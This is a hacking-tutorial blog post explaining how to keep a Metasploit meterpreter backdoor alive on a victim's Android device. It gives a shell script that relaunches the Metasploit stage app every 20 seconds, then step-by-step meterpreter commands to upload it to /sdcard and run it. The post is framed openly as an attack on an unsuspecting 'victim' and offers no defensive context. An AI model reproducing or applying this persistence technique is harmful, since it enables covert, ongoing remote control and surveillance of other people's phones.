Persistent Backdoor In Android Using Kali Linux With A Shell Script

Posted: June 19, 2020 in Android Tricks, Linux, Networking, Uncategorized

Hello guys, today we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to fewer permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the methods, there are a lot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into the same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In the above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in the same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.